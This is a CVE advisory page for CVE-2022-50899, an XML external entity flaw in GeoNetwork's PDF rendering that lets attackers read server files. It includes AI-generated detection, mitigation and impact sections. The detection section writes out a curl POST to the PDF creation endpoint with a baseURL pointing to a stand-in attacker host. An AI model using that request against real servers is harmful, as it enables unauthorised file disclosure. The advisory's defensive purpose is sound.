CVE-2022-50899
Unknown Unknown - Not Provided
XXE Vulnerability in Geonetwork PDF Rendering Allows File Disclosure

Publication date: 2026-01-13

Last updated on: 2026-02-27

Assigner: VulnCheck

Description
Geonetwork 3.10 through 4.2.0 contains an XML external entity vulnerability in PDF rendering that allows attackers to retrieve arbitrary files from the server. Attackers can exploit the insecure XML parser by crafting a malicious XML document with external entity references to read system files through the baseURL parameter in PDF creation requests.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-01-13
Last Modified
2026-02-27
Generated
2026-06-16
AI Q&A
2026-01-14
EPSS Evaluated
2026-06-14
NVD
CVE-2022-50899
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
osgeo geonetwork From 3.10.0 (inc) to 4.2.0 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-611 The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2022-50899 is an XML External Entity (XXE) vulnerability in GeoNetwork versions 3.10 through 4.2.0. It occurs during the PDF rendering process when the application processes XML input without securely configuring the XML parser. Attackers can craft malicious XML documents containing external entity references and submit them via the baseURL parameter in PDF creation requests. This allows them to retrieve arbitrary files from the server by exploiting the insecure XML parser, potentially reading sensitive system files. [1, 2]

Detection Guidance

This vulnerability can be detected by monitoring for suspicious POST requests to the endpoint `/geonetwork/pdf/create.json` that include a JSON payload with a `baseURL` parameter pointing to an external XML file. You can use network monitoring tools or web server logs to identify such requests. For example, using curl to simulate or detect such requests: `curl -X POST -H "Content-Type: application/json" -d '{"baseURL":"http://attacker/xxe.xml"}' http://your-geonetwork-server/geonetwork/pdf/create.json`. Additionally, inspecting logs for unusual external URL references in the `baseURL` parameter or unexpected XML processing errors may help detect exploitation attempts. [1]

Mitigation Strategies

Immediate mitigation steps include restricting or disabling external entity processing in the XML parser used by GeoNetwork during PDF rendering. If possible, update GeoNetwork to a version later than 4.2.0 where this vulnerability is fixed. Additionally, implement network-level controls to block outgoing requests to untrusted external URLs from the GeoNetwork server, especially those targeting the PDF creation endpoint. Monitoring and filtering incoming requests to ensure the `baseURL` parameter does not reference untrusted external resources can also reduce risk. [1, 2]

Impact Analysis

This vulnerability can allow attackers to retrieve arbitrary files from the server hosting GeoNetwork, potentially exposing sensitive information such as system files. Since the attack requires no privileges or user interaction and can be performed remotely over the network, it poses a significant confidentiality risk. The attacker can exfiltrate sensitive data, which could lead to further exploitation or compromise of the affected system. [1, 2]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2022-50899. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart